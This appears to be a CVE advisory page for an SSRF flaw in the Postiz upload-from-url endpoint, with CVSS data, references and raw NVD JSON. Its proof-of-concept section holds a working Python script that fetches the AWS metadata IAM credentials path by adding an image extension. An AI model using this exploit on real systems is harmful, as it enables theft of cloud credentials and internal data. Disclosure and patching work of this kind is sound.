CVE-2026-34576

Description

Postiz is an AI social media scheduling tool. Prior to version 2.21.3, the POST /public/v1/upload-from-url endpoint accepts a user-supplied URL and fetches it server-side using axios.get() with no SSRF protections. The only validation is a file extension check (.png, .jpg, etc.) which is trivially bypassed by appending an image extension to any URL path. An authenticated API user can fetch internal network resources, cloud instance metadata, and other internal services, with the response data uploaded to storage and returned to the attacker. This issue has been patched in version 2.21.3.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:gitroom:postiz:*:*:*:*:*:*:*:* - VULNERABLE

Postiz < 2.21.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (example)
target_url = "https://target-postiz-instance.com/public/v1/upload-from-url"

# Payload: AWS metadata endpoint with image extension bypass
# Internal metadata endpoint: http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Bypass technique: appending ".png"
payload = {
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/role.png"
}

# Send the POST request (Authentication token might be required based on PR:L)
headers = {
    "Authorization": "Bearer <VALID_TOKEN>",
    "Content-Type": "application/json"
}

response = requests.post(target_url, json=payload, headers=headers)

# Check if the internal resource was fetched
if response.status_code == 200:
    print("SSRF Successful! Response data:")
    print(response.json())
else:
    print("Failed to exploit")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34576
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34576
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34576/
[4] VulDB https://vuldb.com/cve/CVE-2026-34576
[5] https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.3
[6] https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-89vp-m2qw-7v34

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34576", "sourceIdentifier": "[email protected]", "published": "2026-04-02T18:16:30.180", "lastModified": "2026-04-07T21:21:43.280", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Postiz is an AI social media scheduling tool. Prior to version 2.21.3, the POST /public/v1/upload-from-url endpoint accepts a user-supplied URL and fetches it server-side using axios.get() with no SSRF protections. The only validation is a file extension check (.png, .jpg, etc.) which is trivially bypassed by appending an image extension to any URL path. An authenticated API user can fetch internal network resources, cloud instance metadata, and other internal services, with the response data uploaded to storage and returned to the attacker. This issue has been patched in version 2.21.3."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitroom:postiz:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.21.3", "matchCriteriaId": "D21ABC46-FB7C-419E-81AA-D0BDD64100CC"}]}]}], "references": [{"url": "https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.3", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-89vp-m2qw-7v34", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}